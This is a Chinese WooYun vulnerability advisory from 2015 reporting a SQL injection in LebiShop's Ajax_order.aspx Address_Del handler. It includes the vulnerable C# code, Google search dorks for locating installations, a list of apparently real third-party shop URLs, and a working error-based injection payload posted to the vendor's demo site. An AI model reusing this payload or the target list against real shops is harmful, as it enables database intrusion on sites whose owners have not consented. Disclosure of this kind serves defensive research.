当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090352

漏洞标题:LebiShop系统sql注入

相关厂商:LebiShop

漏洞作者: hello

提交时间:2015-01-09 15:55

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

官网 http://www.lebi.cn/
demo站点 http://demo.lebi.cn/
用google搜索 关键词 intext:Powered by LebiShop
或者google搜索关键词
Powered by LebiShop inurl:Category.aspx

详细说明:

下面是一部分案例 安装量是有的

http://168dev.com/lebishop/Category.aspx
http://oa.psy123.com.cn/AllCategories.aspx
http://www.huacaiye.com/Category.aspx?tid=1
http://daiba.com.cn/Category.aspx?id=9
http://hkapp.cn/EN/Category.aspx?id=10
http://54mbb.com/EN/NewsDetails.aspx?id=5
http://shop.lutoog.com/Brand.aspx?id=189
http://queengift.net/EN/Brand.aspx?id=190
http://www.snsrn.com/en/
http://www.skycastle100.com/Search.aspx?keyword=lianyiquan
http://71pg.com/Category.aspx?tid=35
http://www.rft.net.cn/Search.aspx?keyword=[key]&sort=1&page=2
http://lovedou.com/en/
http://www.woofoo51.com/EN/Category.aspx?id=111&pid=0&sort=1&tid=0&page=1
http://newautoch.com/NewsDetails.aspx?id=5
http://memy.cc/
http://www.thanks789.com/Brand.aspx?id=191
http://m.gzyytz.cn/
http://www.thanks789.com/Brand.aspx?id=191


漏洞地址

http://demo.lebi.cn/ajax/Ajax_order.aspx


public void Address_Del()
{
string str = RequestTool.RequestString("id"); //只是处理了单引号 这里不需要单引号
if (str == "")
{
base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}");
}
else
{
B_Lebi_User_Address.Delete(string.Concat(new object[] { "User_id = ", base.CurrentUser.id, " and id in(", str, ")" }));//存在注入
if (B_Lebi_User_Address.GetModel(string.Concat(new object[] { "User_id = ", base.CurrentUser.id, " and id = ", base.CurrentUser.User_Address_id })) == null)
{
if (B_Lebi_User_Address.GetModel("User_id = " + base.CurrentUser.id) != null)
{
base.CurrentUser.User_Address_id = B_Lebi_User_Address.GetMaxId("User_id=" + base.CurrentUser.id);
}
B_Lebi_User.Update(base.CurrentUser);
}
base.Response.Write("{\"msg\":\"OK\"}");
}
}


漏洞证明
访问

http://demo.lebi.cn/ajax/Ajax_order.aspx


post提交

__Action=Address_Del&id=-1) and convert(int,@@version)>0--


667.png


漏洞证明:

漏洞证明如上

修复方案:

对id进行处理

版权声明:转载请注明来源 hello@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝